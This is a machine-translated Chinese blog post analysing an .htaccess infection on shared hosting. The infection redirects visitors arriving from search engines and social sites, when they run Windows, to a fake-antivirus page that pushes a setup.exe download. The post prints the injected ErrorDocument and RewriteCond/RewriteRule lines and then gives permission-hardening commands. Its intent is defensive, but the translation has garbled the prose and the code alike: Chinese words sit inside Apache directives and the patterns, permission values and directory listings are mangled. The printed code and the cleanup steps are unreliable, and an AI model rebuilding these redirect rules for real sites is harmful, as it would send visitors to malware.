恶意软件/病毒 - htaccess的“改写”重定向

一种新型的病毒 喔不知道的不多,影响托管的网站 不可靠的服务器 用户帐户/子帐户可以“看到”对方。 具体来说,托管帐户都将在文件夹“虚拟主机“写作的权利 用户文件夹 “虚拟主机”在大多数情况下,被赋予了一般用户...经销商。 这是一个典型的Web服务器不使用 WHM / cPanel的的.

行动的病毒。htaccess的 - htaccess的哈克。

病毒 影响文件 的。htaccess 网站的牺牲品。 我加线/ 指示访问者重定向 (来自雅虎,MSN,谷歌,脸谱,yaindex,叽叽喳喳,MySpace上,等网站和门户网站高流量)的一些网站,提供“杀毒“这是 假冒杀毒软件,这是我在介绍中写道 .

这是怎样一个 的。htaccess 影响:(无法访问内容的URL中的下列行)

ErrorDocument 500 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=0
ErrorDocument 502 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=2
ErrorDocument 403 hxxp://wwww.peoriavascularsurgery.com/main.php?i=J8iiidsar/qmiRj7V8NOyJoXpA==&e=3

RewriteEngine On

的RewriteCond%{HTTP_REFERER} * Yandex的。* $ [NC]
的RewriteCond%{HTTP_REFERER} * Odnoklassniki * $ [NC]
的RewriteCond%{HTTP_REFERER} *的Vkontakte。* $ [NC]
的RewriteCond%{HTTP_REFERER} *蓝巴勒* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *管* $ [NC]
的RewriteCond%{HTTP_REFERER} *维基百科。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *博客* $ [NC]
的RewriteCond%{HTTP_REFERER} *百度* $ [NC]
的RewriteCond%{HTTP_REFERER} * Qq.com * $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *的Myspace * $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * Twitter的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *为必填项。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *谷歌* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *现场。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * AOL * $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *冰* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * MSN * $ [NC]
的RewriteCond%{HTTP_REFERER} *亚马逊。* $ [NC]
*易趣的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * LinkedIn * $ [NC,OR]
的RewriteCond%{HTTP_REFERER}。照片。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * LiveJasmin上。* $ [NC]
的RewriteCond%{HTTP_REFERER} *搜搜。* $ [NC]
的RewriteCond%{HTTP_REFERER} * DoubleClick的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *版权所有。Pornhub * $ [NC]
的RewriteCond%{HTTP_REFERER} * Orkut的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * LiveJournal的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER}。* WordPress的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *雅虎* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *卖出* $ [NC]
*激发的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * AltaVista的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * MSN * $ [NC]
*网景的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * HOTBOT * $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *转到* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} * Infoseek的* $ [NC,OR]
的RewriteCond%{HTTP_REFERER}。妈妈。* $ [NC,OR]
的RewriteCond%{HTTP_REFERER} *搜狗。* $ [NC]
的RewriteCond%{HTTP_REFERER} * Lycos的* $ [NC,OR]
*搜索的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * MetaCrawler * $ [NC,OR]
*邮件的RewriteCond%{HTTP_REFERER}。* $ [NC]
的RewriteCond%{HTTP_REFERER} * Dogpile网站。* $ [NC]

的RewriteCond%{HTTP_USER_AGENT} * Windows *的。
*重写规则。 [R,L]

RewriteCond%{REQUEST_FILENAME}!-F
的RewriteCond%{REQUEST_FILENAME}-D!
的RewriteCond%{REQUEST_FILENAME}!* JPG $ | * GIF $ | * PNG $
的RewriteCond%{HTTP_USER_AGENT} * Windows *的。
*重写规则。 [R,L]

使用WordPress的人会发现这些文件中的行 的。htaccess的public_html。 此外,病毒会创建一个相同htaccess的文件夹中。 WP-内容.

*也有在哪些情况下而不是发生peoriavascularsurgery.com的 dns.thesoulfoodcafe.com 或其他地址。

是什么让这个病毒。

一旦重定向,张开双臂迎接游客的消息:

警告!
您的电脑包含各种病毒和恶意程序存在的迹象。 您的即时需要防病毒系统检查!
安全系统将执行一个快速和免费的扫描您的电脑病毒和恶意程序。

1恶意软件

无论哪个按钮被按下时,我们采取的页面“我的电脑“创建模仿 设计XP。 这会自动启动“扫描”结束时,我们发现“感染”。

2恶意软件

之后单击“确定”或“取消”,它将开始 下载文件 SETUP.EXE。 这 setup.exe是假的防病毒 影响系统。 你安装一些恶意软件,病毒进一步传播链接,而且除了这些以外一个 防病毒软件 (全是假的),受害人被邀请来买。
那些谁已经接触病毒可能使用这种形式 。 它也建议您扫描整个硬盘。 建议 卡巴斯基互联网安全套装卡巴斯基反病毒.

这种类型的病毒会影响游客OS操作系统 Windows 2000的是Windows Me,Windows XP中,Windows NT中,Windows 98的 和Windows 95。 到目前为止,还没有已知的感染病例的操作系统Windows Vista和Windows 7。

我们怎样才能清除此病毒。htaccess文件在服务器上,以及如何防止感染。

1. 分析可疑文件和擦除代码。 为了确保该文件不仅受 的。htaccess 更好 分析所有文件 。PHP si JS。.

2。 重写文件。我和htaccess的设置 CHMOD 644的744 仅具有写访问权限 用户店主.

3。 当您创建一个网站的文件夹中的一个托管帐户 /主页/ Webroot公司 这会自动创建一个文件夹,经常有用户的姓名(用户的cPanel,FTP等)。 为防止写入数据,并从一个用户到另一个传播病毒,它是建议要设置每个用户的文件夹:

chmod或644的744 755 - 显示644。
乔敦-R nume_user nume_folder。
chgrp命令-R nume_user nume_folder

LS-所有 如果他们作出正确的方法来检查。 应该会出现这样的事情:

drwx-X-X 12 Dinamics Dinamics五月4096 6 14:51 Dinamics /
drwx-X-X 10杜兰杜兰三月4096 7 07:杜兰46 /
drwx-X-X 12 4096月29 11管管:23管/
drwxr-XR-X 14二月4096日26 2009快递快递快递/
drwxr-XR-X 9 EZO EZO五月4096 19 01:EZO 09 /
drwx-X-X制药PHARMA 9。12月4096日19 22:制药29 /

如果上面任何一个是userele FTP 被感染的文件它不能发送病毒到另一个用户主机。 这是最起码的安全网,以保护在Web服务器上的托管账户。

这种类型的病毒影响的地区的常见元素。

所有受影响地区的访问者重定向到网站域名中含有“/“。

这种“htaccess文件的病毒。“CMS任何类型的影响(的Joomla,WordPress的,PHPBB等),使用 的。htaccess

htaccess的重定向病毒哈克&.

恶意软件/病毒 - htaccess的“改写”重定向

关于作者

隐形LP

创始人和主编 隐身设置在2006日期。
在Linux操作系统上(尤其是CentOS的)的Mac OS X,Windows XP中>的Windows 10和WordPress(CMS)的经验。

发表评论

本网站使用Akismet来减少垃圾邮件。 了解您的数据如何处理.